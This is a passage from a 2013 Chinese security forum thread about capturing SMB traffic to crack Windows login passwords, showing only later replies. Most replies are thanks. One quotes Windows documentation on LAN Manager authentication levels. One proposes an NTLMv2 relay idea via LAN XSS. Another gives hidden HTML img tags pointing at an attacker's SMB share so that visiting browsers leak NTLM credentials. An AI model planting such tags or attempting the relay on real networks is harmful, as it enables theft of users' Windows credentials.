首页
社区
课程
招聘
[原创]实验:SMB抓包破解windows登陆密码
发表于: 2013-7-27 16:10 73248

[原创]实验:SMB抓包破解windows登陆密码

2013-7-27 16:10
73248
收藏
免费 5
支持
分享
最新回复 (44)
雪    币: 251
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
26
好文章!,MARK
2013-8-26 17:18
0
雪    币: 287
活跃值: (18)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
27
谢谢楼主分享,探索永无止境
2013-9-3 09:38
0
雪    币: 255
活跃值: (37)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
28
看到这个,我瞬间硬了!!!谢谢撸主!
2013-9-3 17:56
0
雪    币: 9
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
29
虽然不懂但是很吊的感觉
2013-9-6 21:59
0
雪    币: 274
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
30
mark mark mark
2013-9-10 17:18
0
雪    币: 370
活跃值: (15)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
31
网络安全: LAN 管理器身份验证级别

此安全设置确定网络登录使用的质询/响应身份验证协议。此选项会影响客户端使用的身份验证协议的等级、协商的会话安全的等级以及服务器接受的身份验证的等级,其设置值如下:

发送 LM _NTLM 响应: 客户端使用 LM 和 NTLM 身份验证,而决不会使用 NTLMv2 会话安全;域控制器接受 LM、NTLM 和 NTLMv2 身份验证。

发送 LM & NTLM - 如果协商一致,则使用 NTLMv2 会话安全: 客户端使用 LM 和 NTLM 身份验证,并且在服务器支持时使用 NTLMv2 会话安全;域控制器接受 LM、NTLM 和 NTLMv2 身份验证。

仅发送 NTLM 响应: 客户端仅使用 NTLM 身份验证,并且在服务器支持时使用 NTLMv2 会话安全;域控制器接受 LM、NTLM 和 NTLMv2 身份验证。

仅发送 NTLMv2 响应: 客户端仅使用 NTLMv2 身份验证,并且在服务器支持时使用 NTLMv2 会话安全;域控制器接受 LM、NTLM 和 NTLMv2 身份验证。

仅发送 NTLMv2 响应\拒绝 LM: 客户端仅使用 NTLMv2 身份验证,并且在服务器支持时使用 NTLMv2 会话安全;域控制器拒绝 LM (仅接受 NTLM 和 NTLMv2 身份验证)。

仅发送 NTLMv2 响应\拒绝 LM & NTLM: 客户端仅使用 NTLMv2 身份验证,并且在服务器支持时使用 NTLMv2 会话安全;域控制器拒绝 LM 和 NTLM (仅接受 NTLMv2 身份验证)。

重要信息:
此设置会影响运行 Windows 2000 Server、Windows 2000 Professional、Windows XP Professional 以及 Windows Server 2003 家族的计算机与运行 Windows NT 4.0 或更早版本的计算机通过网络进行通信的能力。例如,截至本次编写,运行 Windows NT 4.0 SP4 或更早版本的计算机尚不支持 NTLMv2。运行 Windows 95 和 Windows 98 的计算机尚不支持 NTLM。

默认:
在服务器上发送 LM & NTLM 响应。
在工作站上未定义。
(& )
2013-9-10 21:54
0
雪    币: 190
活跃值: (40)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
32
感谢楼主,又看了一遍,结合局域网xss应用,威力很大啊
请教下win7下可有类似的利用方法吗?
我的理解:win7的smb认证过程也是如此,只不过加密方式是ntlmv2,理论上可以抓取密文,但是只是密文不可解,那我们可不可以换种思路,就像令牌伪造,不用解密,首先某被攻击机在xss内快速循环访问攻击机,这时访问某一smb资源,取得challenge,设置攻击机challenge为获得的challenge,等待目标的加密后的ntlmv2密文,然后伪造加密后的ntlmv2密文,就能够以被攻击机的权限访问该smb资源,不知道是否可行?再次感谢楼主
2013-12-31 16:48
0
雪    币: 324
活跃值: (113)
能力值: ( LV15,RANK:280 )
在线值:
发帖
回帖
粉丝
33
没试过。你可以实验一下。期待看到你的实验结果。
2014-1-6 13:21
0
雪    币: 200
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
34
大神啊 果然牛啊!
2014-1-11 15:12
0
雪    币: 190
活跃值: (40)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
35
刚亲测了下,需要主要html to smb link
IE可用
<img src="\\10.1.1.3\Incoming" hidden="true">
firfox要用这个
<img src="file://///10.1.1.3\Incoming" hidden="true">
2014-2-27 11:16
0
雪    币: 71
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
36
这个应该是ms08-068 现在应该xp修补上了吧,楼主测试的时候是打全补丁测试的?
2014-3-15 01:54
0
雪    币: 324
活跃值: (113)
能力值: ( LV15,RANK:280 )
在线值:
发帖
回帖
粉丝
37
ms08-068是远程代码执行漏洞,非本文所讲。
2014-3-18 22:40
0
雪    币: 29
活跃值: (16)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
38
学了一招,在内网用不错的
2014-3-22 23:58
0
雪    币: 34
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
39
打酱油路过
2014-4-25 09:08
0
雪    币: 157
活跃值: (29)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
40
N年前我就实现了
2014-5-16 09:15
0
雪    币: 9
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
41
确实很不错,慢慢研究,有空动手试一试
2014-5-20 18:40
0
雪    币: 1050
活跃值: (1132)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
42
看看,,观摩观摩。。。
2014-7-6 17:10
0
雪    币: 23
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
43
很强大啊,试过后再来
2014-9-12 02:13
0
雪    币: 202
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
44
好东东,学习了
2015-1-3 21:46
0
雪    币: 510
活跃值: (433)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
45
这个东西,在01 02年的时候,在xfocus上就玩了。
2015-1-5 16:56
0
游客
登录 | 注册 方可回帖
返回
//